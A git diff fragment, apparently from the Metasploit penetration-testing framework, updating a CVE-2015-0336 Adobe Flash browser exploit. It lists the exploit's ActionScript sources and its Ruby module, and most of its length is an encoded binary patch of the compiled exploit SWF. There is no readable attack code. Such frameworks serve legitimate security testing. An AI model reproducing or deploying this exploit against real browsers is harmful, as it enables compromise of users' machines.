100644 external/source/exploits/CVE-2015-0336/Exploiter.as create mode 100644 external/source/exploits/CVE-2015-0336/Logger.as delete mode 100755 external/source/exploits/CVE-2015-0336/Msf.as create mode 100644 external/source/exploits/CVE-2015-0336/PE.as create mode 100755 external/source/exploits/CVE-2015-0336/TriggerLinux/TriggerLinux.as2proj create mode 100755 external/source/exploits/CVE-2015-0336/TriggerLinux/src/Main.as create mode 100644 modules/exploits/multi/browser/adobe_flash_net_connection_confusion.rb diff --git a/data/exploits/CVE-2015-0336/msf.swf b/data/exploits/CVE-2015-0336/msf.swf old mode 100755 new mode 100644 index 97b6ffe99c8b2f00fb4196a19f6bd600601dfc99..c014a3ef20856c4d1e2997a15ca1c484c113160c GIT binary patch delta 20478 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 